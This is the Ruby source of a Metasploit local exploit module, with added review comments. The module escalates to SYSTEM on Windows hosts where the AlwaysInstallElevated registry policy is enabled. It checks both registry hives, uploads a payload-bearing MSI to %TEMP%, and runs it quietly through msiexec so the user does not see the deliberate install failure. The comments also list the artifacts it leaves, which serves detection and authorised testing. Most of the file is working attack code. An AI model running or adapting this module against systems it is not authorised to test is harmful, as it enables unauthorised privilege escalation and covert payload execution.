metasploit-framework/modules/exploits/windows/local/always_install_elevated.rb


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
  # Local privilege escalation via the Windows Installer "AlwaysInstallElevated"
  # policy. Everything that touches the target (registry reads, file upload,
  # command execution) goes through the mixins included below; this class only
  # wires them together.
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Post::File
  include Msf::Post::Windows::Registry

  # Module metadata plus two advanced options.
  #
  # @param info [Hash] module info, merged through update_info
  #
  # Advanced options registered here:
  #   LOG_FILE - optional remote path; when set it is passed to msiexec as "/l*",
  #              so the installer log is written on the target.
  #   QUIET    - when true (the default) "/quiet" is added, which the Description
  #              says suppresses the installer's failure dialog.
  def initialize(info={})
    super(update_info(info, {
      'Name' => 'Windows AlwaysInstallElevated MSI',
      'Description' => %q{
This module checks the AlwaysInstallElevated registry keys which dictates if
.MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM).
The generated .MSI file has an embedded executable which is extracted and run
by the installer. After execution the .MSI file intentionally fails installation
(by calling some invalid VBS) to prevent it being registered on the system.
By running this with the /quiet argument the error will not be seen by the user.
},
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Ben Campbell',
          'Parvez Anwar' # discovery?/inspiration
        ],
      'Arch' => [ ARCH_X86, ARCH_X86_64 ],
      'Platform' => [ 'win' ],
      'SessionTypes' => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          # NOTE(review): 'WfsDelay' and 'MSI::UAC' are consumed by the framework /
          # Msf::Exploit::EXE, not by this file -- confirm their meaning there
          # before changing them.
          'WfsDelay' => 10,
          'EXITFUNC' => 'process',
          'MSI::UAC' => true
        },
      'Targets' =>
        [
          [ 'Windows', { } ],
        ],
      'References' =>
        [
          [ 'URL', 'http://www.greyhathacker.net/?p=185' ],
          [ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ],
          [ 'URL', 'http://rewtdance.blogspot.co.uk/2013/03/metasploit-msi-payload-generation.html']
        ],
      'DisclosureDate'=> 'Mar 18 2010',
      'DefaultTarget' => 0
    }))

    register_advanced_options([
      OptString.new('LOG_FILE', [false, 'Remote path to output MSI log file to.', nil]),
      OptBool.new('QUIET', [true, 'Run the MSI with the /quiet flag.', true])
    ], self.class)
  end

  # Reads the AlwaysInstallElevated policy value from both hives.
  #
  # Only the combination "HKLM value present and non-zero AND HKCU value present
  # and non-zero" yields Vulnerable; that is also the condition under which the
  # policy is effective, so a defender clearing either value is enough to make
  # this check report Safe. HKLM is read first and a missing or zero HKLM value
  # returns Safe without reading HKCU at all.
  #
  # All diagnostics go through vprint_*, so with VERBOSE off the reason for a
  # Safe result is not shown.
  #
  # @return [Msf::Exploit::CheckCode] Safe or Vulnerable
  def check
    install_elevated = "AlwaysInstallElevated"
    installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer"
    hkcu = "HKEY_CURRENT_USER\\#{installer}"
    hklm = "HKEY_LOCAL_MACHINE\\#{installer}"

    local_machine_value = registry_getvaldata(hklm,install_elevated)
    if local_machine_value.nil?
      vprint_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.")
      return Msf::Exploit::CheckCode::Safe
    elsif local_machine_value == 0
      vprint_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
      return Msf::Exploit::CheckCode::Safe
    else
      # NOTE(review): any non-nil value other than Integer 0 lands here, so a
      # string-typed or non-1 value is treated as "enabled". This assumes
      # registry_getvaldata returns an Integer for REG_DWORD data -- confirm.
      vprint_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
      current_user_value = registry_getvaldata(hkcu,install_elevated)
    end

    if current_user_value.nil?
      vprint_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.")
      return Msf::Exploit::CheckCode::Safe
    elsif current_user_value == 0
      vprint_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
      return Msf::Exploit::CheckCode::Safe
    else
      vprint_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
      return Msf::Exploit::CheckCode::Vulnerable
    end
  end

  # Uploads the generated MSI to the target's temp directory and runs it with
  # msiexec.exe.
  #
  # Host artifacts this leaves behind, useful for detection and for verifying
  # FileDropper cleanup: an .msi with a random 6-13 letter name under %TEMP%,
  # the msiexec.exe "/package" process launch, and (when LOG_FILE is set) the
  # installer log at that path.
  #
  # Returns silently when check is not Vulnerable -- the only explanation is the
  # vprint_error output inside check, so nothing is shown unless VERBOSE is on.
  def exploit
    return unless check == Msf::Exploit::CheckCode::Vulnerable

    # rand(8)+6 -> 6..13 alphabetic characters before the extension.
    msi_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"
    msi_source = generate_payload_msi

    # Upload MSI
    # NOTE(review): expand_path comes from a mixin; presumably it resolves
    # %TEMP% on the target side -- confirm.
    msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip
    print_status("Uploading the MSI to #{msi_destination} ...")
    write_file(msi_destination, msi_source)
    # Deleted by FileDropper at session cleanup, not by this method.
    register_file_for_cleanup(msi_destination)

    # Build the msiexec command line from the advanced options. LOG_FILE is
    # interpolated verbatim; it is operator input, not untrusted data.
    if datastore['LOG_FILE'].nil?
      logging = ""
    else
      logging = "/l* #{datastore['LOG_FILE']} "
    end

    if datastore['QUIET']
      quiet = "/quiet "
    else
      quiet = ""
    end

    cmd = "msiexec.exe #{logging}#{quiet}/package #{msi_destination}"
    print_status("Executing MSI...")
    vprint_status("Executing: #{cmd}")
    begin
      result = cmd_exec(cmd)
    rescue Rex::TimeoutError
      # The rescue branch never assigns result, so the feedback line below
      # prints an empty value after a timeout.
      vprint_status("Execution timed out.")
    end
    vprint_status("MSI command-line feedback: #{result}")
  end
end